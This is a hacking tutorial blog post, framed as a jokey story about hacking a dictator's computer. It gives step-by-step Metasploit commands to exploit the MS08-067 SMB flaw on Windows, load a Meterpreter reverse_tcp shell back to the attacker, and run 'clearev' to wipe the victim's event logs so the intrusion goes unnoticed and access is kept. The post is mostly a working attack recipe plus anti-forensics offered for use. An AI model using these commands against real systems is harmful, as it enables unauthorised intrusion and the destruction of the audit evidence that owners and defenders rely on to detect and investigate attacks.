Hack Like a Pro: How to Cover Your Tracks So You Aren't Detected

Apr 12, 2013 11:07 PM
May 26, 2016 07:26 PM
635013867473327354.jpg

Welcome back, my greenhorn hackers!

Congratulations on your successful hack that saved the world from nuclear annihilation from our little, bellicose, Twinkie-eating dictator. The rest of world may not know what you did, but I do. Good job!

635013829696874790.jpg

Now that we hacked into the malevolent dictator's computer and temporarily disabled his nuclear launch capability, we have to think about covering our tracks so that he and his minions can't track our good works back to us.

So, in this hack, we will go into his computer again, implant the Meterpreter and remove any trace that we had been there from his log files. Let's fire up Metasploit and get to work on removing any evidence that we had ever been on the dictator's computer.

Step 1: Compromise His System Again

Let's start with the same hack we used to get into the dictator's computer initially:

exploit/windows/smb/ms08_067_netapi

But instead of using the VNC payload, we will load the Meterpreter payload. Type:

  • msf> use exploit/windows/smb/ms08_067_netapi
635013821745749913.jpg

Before we move on, let's learn a bit more about this exploit. Type:

  • msf exploit(ms08_067_netapi) info

This should bring a screenshot below that provides us with some basic information about this exploit. We can see that this hack exploits a parsing flaw in the netapi dll. In this way, we can place our own payload on the system, which in this case is the Meterpreter.

635013821851986099.jpg

Now we load the payload by typing:

  • msf exploit(ms08_067_netapi) set PAYLOAD windows/meterpreter/reverse_tcp

Now that we have the exploit and payload set, we need to set the options. In this case, we need to set our LHOST (us, the attacker) and the RHOST (the victim, our belligerent dictator's computer) IP addresses. Simply type in the IP address of your computer and of his computer.

635013821965398299.jpg

Step 2: Take Control of His Computer

Now that we have everything set to take control, we just type:

  • msf exploit(ms08_067_netapi) exploit

If we are successful, we should see a Meterpreter prompt on our screen. We now have total control of his system!

635013830577496337.jpg

At the meterpreter prompt, we now type:

  • meterpreter > clearev

As you can see in the screenshot above, this command proceeds to clear the event logs on our bellicose dictator's computer so that he and his minions have no clue that we've ever been there. If we could see the event logs on his computer, we will see that all events have been cleared.

635013552670988054.jpg

This is critical both to protect our being found out, but also that we continue to have access to his computer. Once they know that someone has hacked his computer, it's likely they will take measures to prevent our returning to it.

Now, make sure to come back for more hacking fun and games on our dictator's computer!

Photos by The Guardian, Matthew Collingwood/Shutterstock

Comments

No Comments Exist

Be the first, drop a comment!